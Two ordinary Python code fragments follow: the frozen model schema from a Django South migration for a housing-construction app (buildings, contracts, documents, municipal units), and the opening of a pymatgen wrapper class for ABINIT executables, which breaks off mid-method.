'cad_passport': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'clinic': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'comment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'complete_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'contract': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['build.Contract']", 'null': 'True', 'blank': 'True'}),
'developer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Developer']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'driveways': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'electric_supply': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'entrance_door': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'finish_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2018, 12, 31, 0, 0)'}),
'flat_num': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'flats_amount': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'floors': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'gas_supply': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'hallway': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Hallway']", 'null': 'True', 'blank': 'True'}),
'heating': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'hot_water_supply': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_doors': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'is_balcony': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_clother_drying': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_dustbin_area': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_heat_boiler': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_intercom': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_loggia': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_parking': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_playground': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_routes': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_water_boiler': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'kindergarden': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'kitchen': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Kitchen']", 'null': 'True', 'blank': 'True'}),
'market': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'mo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mo.MO']"}),
'offer': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'payment_perspective': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'permission': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'public_transport': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'readiness': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'room': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Room']", 'null': 'True', 'blank': 'True'}),
'school': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'start_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2013, 1, 1, 0, 0)'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'water_removal': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'water_settlement': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'wc': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.WC']", 'null': 'True', 'blank': 'True'}),
'window_constructions': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
'build.contract': {
'Meta': {'object_name': 'Contract'},
'area': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'area_cmp': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}),
'budget': ('django.db.models.fields.IntegerField', [], {'max_length': '1024', 'null': 'True'}),
'clinic': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'creation_form': ('django.db.models.fields.SmallIntegerField', [], {'null': 'True', 'blank': 'True'}),
'date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'developer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Developer']", 'null': 'True', 'blank': 'True'}),
'docs': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['build.ContractDocuments']", 'null': 'True', 'blank': 'True'}),
'driveways': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'electric_supply': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'entrance_door': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'finish_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2018, 12, 31, 0, 0)'}),
'flats_amount': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'floors': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'gas_supply': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'hallway': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Hallway']", 'null': 'True', 'blank': 'True'}),
'has_trouble_docs': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'heating': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'hot_water_supply': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_doors': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'is_balcony': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_clother_drying': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_dustbin_area': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_heat_boiler': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_intercom': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_loggia': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_parking': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_playground': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_routes': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_water_boiler': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'kindergarden': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'kitchen': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Kitchen']", 'null': 'True', 'blank': 'True'}),
'market': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'mo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mo.MO']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
'num': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'period_of_payment': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'public_transport': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'room': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Room']", 'null': 'True', 'blank': 'True'}),
'school': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'start_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2013, 1, 1, 0, 0)'}),
'summ_mo_money': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'summ_without_mo_money': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'summa': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'water_removal': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'water_settlement': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'wc': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.WC']", 'null': 'True', 'blank': 'True'}),
'window_constructions': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
'build.contractdocuments': {
'Meta': {'object_name': 'ContractDocuments'},
'acceptance_acts': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'approval_citizen_statement': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'building_permissions': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'cost_infos': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'creation_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'facility_permission': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'hiring_contract': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'land_right_stating': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'mo_certificate': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'mo_notice_to_citizen': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'mun_act_to_fond': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'mun_contracts': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'photos': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'protocols': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'tec_passport_tec_plan': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'transmission_acts': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'})
},
'build.copybuilding': {
'Meta': {'object_name': 'CopyBuilding'},
'address': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'approve_status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'area': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'area_cmp': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}),
'cad_num': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
'cad_passport': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'clinic': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'comment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'complete_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'contract': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['build.Contract']", 'null': 'True'}),
'developer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Developer']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'driveways': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'electric_supply': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'entrance_door': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'finish_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2018, 12, 31, 0, 0)'}),
'flat_num': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'flats_amount': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'floors': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'gas_supply': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'hallway': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Hallway']", 'null': 'True', 'blank': 'True'}),
'heating': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'hot_water_supply': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_doors': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'is_balcony': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_clother_drying': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_dustbin_area': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_heat_boiler': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_intercom': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_loggia': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_parking': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_playground': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_routes': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_water_boiler': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'kindergarden': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'kitchen': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Kitchen']", 'null': 'True', 'blank': 'True'}),
'market': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'mo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mo.MO']", 'null': 'True', 'blank': 'True'}),
'offer': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'payment_perspective': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'permission': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'public_transport': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'readiness': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'room': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Room']", 'null': 'True', 'blank': 'True'}),
'school': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'start_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2013, 1, 1, 0, 0)'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'water_removal': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'water_settlement': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'wc': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.WC']", 'null': 'True', 'blank': 'True'}),
'window_constructions': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
'build.ground': {
'Meta': {'object_name': 'Ground'},
'address': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'approve_status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'area': ('django.db.models.fields.FloatField', [], {'null': 'True', 'blank': 'True'}),
'area_cmp': ('django.db.models.fields.IntegerField', [], {'default': '1', 'null': 'True', 'blank': 'True'}),
'cad_num': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '2048', 'db_index': 'True'}),
'cad_passport': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'clinic': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'comment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'complete_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'contract': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['build.Contract']", 'null': 'True', 'blank': 'True'}),
'developer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.Developer']", 'null': 'True', 'on_delete': 'models.SET_NULL', 'blank': 'True'}),
'driveways': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'electric_supply': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'entrance_door': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'finish_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'finish_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2018, 12, 31, 0, 0)'}),
'flats_amount': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'floors': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'gas_supply': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'hallway': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Hallway']", 'null': 'True', 'blank': 'True'}),
'heating': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'hot_water_supply': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'internal_doors': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'is_balcony': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_clother_drying': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_dustbin_area': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_heat_boiler': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_intercom': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_loggia': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_parking': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_playground': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_routes': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_water_boiler': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'kindergarden': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'kitchen': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Kitchen']", 'null': 'True', 'blank': 'True'}),
'market': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'mo': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['mo.MO']"}),
'offer': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'payment_perspective': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'permission': ('django.db.models.fields.files.FileField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'public_transport': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'readiness': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'room': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Room']", 'null': 'True', 'blank': 'True'}),
'school': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'start_year': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime(2013, 1, 1, 0, 0)'}),
'state': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'water_removal': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'water_settlement': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'wc': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.WC']", 'null': 'True', 'blank': 'True'}),
'window_constructions': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
'core.basehallway': {
'Meta': {'object_name': 'BaseHallway'},
'ceiling_hook': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'heaters': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lamp': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'smoke_filter': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'sockets': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'switches': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'})
},
'core.basekitchen': {
'Meta': {'object_name': 'BaseKitchen'},
'ceiling_hook': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'heaters': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lamp': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'sink_with_mixer': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'smoke_filter': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'sockets': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'switches': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'})
},
'core.baseroom': {
'Meta': {'object_name': 'BaseRoom'},
'ceiling_hook': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'heaters': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lamp': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'smoke_filter': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'sockets': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'switches': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'})
},
'core.basewc': {
'Meta': {'object_name': 'BaseWC'},
'bath_with_mixer': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'ceiling_hook': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'heaters': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_toilet': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'is_tower_dryer': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'lamp': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'sink_with_mixer': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'smoke_filter': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'sockets': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'switches': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'})
},
'core.developer': {
'Meta': {'object_name': 'Developer'},
'address': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
'boss_position': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'face_list': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'})
},
u'core.hallway': {
'Meta': {'object_name': 'Hallway', '_ormbases': ['core.BaseHallway']},
u'basehallway_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.BaseHallway']", 'unique': 'True', 'primary_key': 'True'}),
'ceiling': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'floor': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'wall': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
u'core.kitchen': {
'Meta': {'object_name': 'Kitchen', '_ormbases': ['core.BaseKitchen']},
u'basekitchen_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.BaseKitchen']", 'unique': 'True', 'primary_key': 'True'}),
'ceiling': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'floor': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'stove': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'wall': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
u'core.room': {
'Meta': {'object_name': 'Room', '_ormbases': ['core.BaseRoom']},
u'baseroom_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.BaseRoom']", 'unique': 'True', 'primary_key': 'True'}),
'ceiling': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'floor': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'wall': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
u'core.wc': {
'Meta': {'object_name': 'WC', '_ormbases': ['core.BaseWC']},
u'basewc_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.BaseWC']", 'unique': 'True', 'primary_key': 'True'}),
'ceiling': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'floor': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'separate': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
'wall': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'})
},
'mo.mo': {
'Meta': {'object_name': 'MO'},
'common_amount': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'common_economy': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'common_percentage': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'common_spent': ('django.db.models.fields.FloatField', [], {'default': '0', 'null': 'True', 'blank': 'True'}),
'creation_form': ('django.db.models.fields.CommaSeparatedIntegerField', [], {'max_length': '24', 'null': 'True', 'blank': 'True'}),
'has_trouble': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'home_orphans': ('django.db.models.fields.IntegerField', [], {'default': '0', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '2048'})
}
}
complete_apps = ['build']
|
|
# coding: utf-8
"""Wrappers for ABINIT main executables"""
from __future__ import unicode_literals, division, print_function
import os
from subprocess import Popen, PIPE
from monty.os.path import which
from pymatgen.util.string_utils import list_strings
from six.moves import map, cStringIO
import logging
logger = logging.getLogger(__name__)
__author__ = "Matteo Giantomassi"
__copyright__ = "Copyright 2013, The Materials Project"
__version__ = "0.1"
__maintainer__ = "Matteo Giantomassi"
__email__ = "gmatteo at gmail.com"
__status__ = "Development"
__date__ = "$Feb 21, 2013M$"
__all__ = [
"Mrgscr",
"Mrggkk",
"Mrgddb",
"Anaddb",
]
class ExecWrapper(object):
"""This class runs an executable in a subprocess."""
def __init__(self, executable=None, verbose=0):
"""
Args:
executable:
path to the executable.
verbose:
Verbosity level.
"""
if executable is None:
executable = self.name
self.executable = which(executable)
self.verbose = int(verbose)
if self.executable is None:
msg = "Cannot find executable %s is PATH\n Use export PATH=/dir_with_exec:$PATH" % executable
raise self.Error(msg)
assert os.path.basename(self.executable) == self.name
def __str__(self):
return "%s" % self.executable
def set_mpi_runner(self, mpi_runner="mpirun"):
# TODO better treatment of mpirunner syntax.
self._mpi_runner = mpi_runner
@property
def mpi_runner(self):
try:
return self._mpi_runner
except AttributeError:
return ""
@property
def name(self):
return self._name
def execute(self, cwd=None):
# Try to execute binary without and with mpirun.
try:
self._execute(cwd=cwd, with_mpirun=False)
except self.Error:
self._execute(cwd=cwd, with_mpirun=True)
def _execute(self, cwd=None, with_mpirun=False):
"""
Execute the executable in a subprocess.
"""
args = [self.executable, "<", self.stdin_fname, ">", self.stdout_fname, "2>", self.stderr_fname]
